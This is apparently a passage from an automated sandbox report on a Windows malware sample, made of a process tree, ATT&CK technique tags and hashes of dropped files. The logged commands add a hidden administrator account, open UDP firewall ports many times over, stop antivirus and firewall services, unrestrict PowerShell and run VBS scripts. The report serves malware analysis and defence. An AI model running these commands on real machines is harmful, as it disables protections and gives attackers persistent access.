- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Set-ExecutionPolicy Unrestricted"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4060
- - C:\Windows\system32\net.exe
    net localgroup administrators session /ADD
    3⤵
    PID:2116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators session /ADD
      4⤵
      PID:1876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3860
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2212
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:5112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2128
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:216
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4776
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1684
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1596
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3104
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3964
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4776
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2896
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1968
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3488
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2336
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4536
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1972
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4540
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1352
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3912
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1580
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4196
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4872
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3876
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2996
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4308
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2172
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:428
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1972
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1888
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3708
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4332
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4072
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4056
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4948
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4568
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3136
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3564
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3408
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3768
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2956
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1784
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4340
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3044
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4060
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1052
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4368
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4312
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2740
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2080
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3948
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2576
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3044
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3960
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3320
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4112
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3948
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4536
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3980
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4316
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3936
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3796
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1680
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3480
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3664
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5040
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4920
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4452
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3820
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:5020
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3664
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:1952
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3720
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2432
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:1348
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2748
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4640
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3088
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:2116
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:2212
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4092
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4436
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:3220
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:4528
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=12627
    3⤵
    PID:4300
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=9415
    3⤵
    PID:3632
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"
  2⤵
  PID:4912
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"
  2⤵
  PID:4780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
  2⤵
  PID:4860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
1⤵
PID:2996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
1⤵
PID:2428

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*Symantec*" /y
1⤵
PID:1632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRPC /y
1⤵
PID:2900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
1⤵
PID:1220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:2120

C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
1⤵
PID:1968

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:2812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Web Service

T1102

Credential Access

Account Manipulation

T1098

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d136d3411d4aa688242c53cafb993aa6

SHA1
1a81cc78e3ca445d5a5193e49ddce26d5e25179f

SHA256
00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

SHA512
282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
243108f8a57b9ea5e8449f382d21605e

SHA1
d2f0009ce295e6db9f6e57eb7e224a50f54710b4

SHA256
2709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94

SHA512
d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
243108f8a57b9ea5e8449f382d21605e

SHA1
d2f0009ce295e6db9f6e57eb7e224a50f54710b4

SHA256
2709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94

SHA512
d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
243108f8a57b9ea5e8449f382d21605e

SHA1
d2f0009ce295e6db9f6e57eb7e224a50f54710b4

SHA256
2709a3a45d831104e0c438e038954aa7f9a69c9ee7fb41d0945b3c2c3e03de94

SHA512
d9bfeb1f37d9c2f758e6c9e68cfa381023fe09c475e49b40cbfc5ef6b7486dc30a9888f4d50c410382633550a1292346dc2edd6c703688b499d2f1f09a517cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
24c13d5530c176b565619683e21ea2e7

SHA1
d65f5d8481f8b2f53ee1295f8fb06c9170914171

SHA256
7282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6

SHA512
12e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
24c13d5530c176b565619683e21ea2e7

SHA1
d65f5d8481f8b2f53ee1295f8fb06c9170914171

SHA256
7282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6

SHA512
12e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41

Download Submit
C:\Users\Admin\Desktop\YcynNote.txt

Filesize
468B

MD5
9ab62c7b89f1dd33303a86d6f6d0f3c5

SHA1
